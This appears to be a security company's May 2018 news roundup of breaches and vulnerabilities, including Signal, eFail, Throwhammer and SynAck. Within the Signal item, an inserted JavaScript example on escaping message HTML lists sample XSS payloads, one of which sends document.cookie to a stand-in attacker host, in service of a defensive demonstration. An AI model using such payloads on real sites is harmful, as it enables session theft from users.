The Month in Hacks: May 2018

Signal vulnerability discovered, Romanian hackers are extradited to the US, and fraudulent Chrome extensions wreak havoc. It's all this and more in The Month in Hacks.

Severe Vulnerability Discovered in Signal Messaging App

Researchers have found a severe vulnerability in the desktop version of Signal, a popular messaging app, that allows attackers to execute malicious code on the Windows or Linux machine running it. An attacker only needs to send a message containing a malicious JavaScript payload; the recipient's Signal Desktop client executes the code without any interaction from the user.

After being informed of the vulnerability, Signal quickly released a patch fixing the flaw. While there is no evidence of the flaw being exploited in the wild, Signal users are advised to update their desktop app as soon as possible.
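The bug class behind the Signal flaw is untrusted message text being inserted into the client's HTML rather than as text. The following is an added example (not Signal's code; the function names, markup and sample payloads are assumptions) showing a chat renderer that interpolates the body into markup beside one that escapes first and links only http(s) URLs, with a small oracle that reports markup which would execute on load:

```javascript
// Added example, not Signal's code: untrusted message text inserted as HTML
// versus inserted as text. Function names and markup are assumptions.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can open a tag or terminate an attribute;
// everything else is inert as text content.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ESCAPES[c]);
}

// Vulnerable: the body is interpolated into markup, so a sender who includes
// a tag gets it parsed, and an event handler on it runs in the recipient's
// client with no click required.
function renderMessageUnsafe(text) {
  return `<div class="body">${text}</div>`;
}

// Fixed: escape first, then link only http(s) URLs found in the escaped text.
// Because the input is already escaped the URL match can never produce a tag,
// and javascript: or data: schemes are never turned into links.
function renderMessageSafe(text) {
  const escaped = escapeHtml(text);
  const linked = escaped.replace(/https?:\/\/[^\s]+/g,
    url => `<a href="${url}" rel="noopener noreferrer" target="_blank">${url}</a>`);
  return `<div class="body">${linked}</div>`;
}

// Test oracle, not a sanitizer: walks the tags in a rendered string and
// reports script elements, inline event handlers and javascript: URLs.
function hasActiveContent(html) {
  const tagRe = /<([a-z][a-z0-9]*)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const [, name, attrs] = m;
    if (name.toLowerCase() === 'script') return true;
    if (/\bon[a-z]+\s*=/i.test(attrs)) return true;
    if (/\b(?:href|src)\s*=\s*["']?\s*javascript:/i.test(attrs)) return true;
  }
  return false;
}

// Constructed sample payloads of the kind a malicious sender could type.
const PAYLOADS = [
  '<img src=x onerror="alert(document.title)">',
  '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>',
  'check this out: https://example.invalid/update?v=2&x=1',
];

for (const p of PAYLOADS) {
  console.log('unsafe active:', hasActiveContent(renderMessageUnsafe(p)));
  console.log('safe   active:', hasActiveContent(renderMessageSafe(p)), renderMessageSafe(p));
}
```

The order matters: escaping runs before link detection, so a URL that the sender wraps in quotes or angle brackets is already inert by the time it is matched, and the anchor's href can only ever carry an http or https scheme.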

Chili's Restaurant Chain Suffers Data Breach

The Chili's restaurant chain has suffered a data breach that may have exposed customer payment card information. In a statement, the company said the breach was first discovered on 11 May and "may have resulted in unauthorized access or acquisition of [customer] payment card data." It is not known how many customers were affected. According to Chili's, malware was used to scrape credit and debit card numbers along with cardholder names from the point-of-sale (PoS) systems used for in-restaurant purchases.

eFail Attack Allows Hackers to Decrypt Encrypted Emails

A set of vulnerabilities dubbed "eFail" by a team of European security researchers could allow an attacker to recover the plaintext of PGP- and S/MIME-encrypted emails if the victim's email client does not handle HTML emails safely.

An eFail attack starts with an encrypted email the attacker has already captured. The attacker wraps the ciphertext in HTML of their own, for example an image tag whose URL is left unterminated, and sends the modified message to the victim. If the victim's email client decrypts the message and renders the HTML, the decrypted text is spliced into the image URL and the client requests that URL from the attacker's server, leaking the plaintext.

Mitigations are to use an email client that does not render HTML emails by default (which prevents external resources from loading automatically), to make sure the client always warns when the integrity of an encrypted message cannot be verified, and, where possible, to decrypt messages outside the email client.

Thieves Steal Millions From Mexican Banks

Thieves reportedly siphoned hundreds of millions of pesos out of Mexican banks, including Banorte, the country's second-largest bank, by creating phantom orders that wired funds to bogus accounts and promptly withdrew the money, two sources close to the government's investigation said. The attackers sent hundreds of false orders to move amounts ranging from tens of thousands to hundreds of thousands of pesos from banks including Banorte to fake accounts at other banks, the sources said, and accomplices then emptied those accounts through cash withdrawals at dozens of branch offices. One source said the thieves transferred more than 300 million pesos ($15.4 million).

T-Mobile Employee Portal Bug Exposes Customer Data

A T-Mobile web domain left millions of customers' account details, including their names, addresses, and in some cases tax identification numbers, unprotected for anyone to access, according to The Verge. The site is a customer care portal intended for employees, but it could be found through search engines and required no password to use its tools. The flaw was an unauthenticated API behind the portal, which T-Mobile took offline a day after the bug was reported through its bug bounty program.

Throwhammer Attack Remotely Hijacks Computers Over the LAN

A new Rowhammer variant dubbed "Throwhammer" allows attackers to compromise systems remotely over the local area network without running any code on the target. By sending a stream of crafted packets to a network card that writes received data directly into host memory (RDMA), an attacker can repeatedly access the same DRAM rows and induce "bit flips" that change the contents of memory.

A very high-speed network is essential to a successful Throwhammer attack, since hundreds of thousands of accesses to specific DRAM locations are needed within a single DRAM refresh interval, on the order of tens of milliseconds, to trigger a bit flip.

The researchers propose mitigations, but no patch or fix is currently available.

Hackers Extradited Over $18 Million Vishing and Smishing Scam

Two Romanian hackers allegedly stole more than $18 million from Americans through an elaborate phishing scheme, according to The Hacker News. The pair have been extradited to the U.S. to face 31 criminal charges.

According to the indictment, the defendants used interactive voice response software to initiate automated phone calls and text messages. The Department of Justice describes these voice- and SMS-based phishing tactics as "vishing" and "smishing". The scheme collected victims' bank account numbers, PINs, and social security numbers before the pair were caught.

First Ransomware To Use 'Process Doppelgänging' Technique

A new variant of the SynAck ransomware is the first ransomware seen using the fileless code injection technique called 'Process Doppelgänging' to evade detection. It is targeting users in the United States, Germany, Iran, and Kuwait.

The technique abuses NTFS transactions: the malware overwrites a legitimate executable inside a transaction, creates a process from the modified file, and then rolls the transaction back, so the malicious code runs while the file on disk looks untouched. Antivirus and process monitoring tools that inspect the file or the process image therefore see what appears to be a legitimate process.

Most ransomware spreads through malicious online advertisements, third-party apps, and phishing emails. Be careful when clicking links or opening unexpected attachments, and keep a regular backup routine to an external storage device.

Talk To An Expert

Interested in learning about how TeleSign's identity and engagement solutions can prevent fraud while fostering secure and global growth for your business? Let's chat.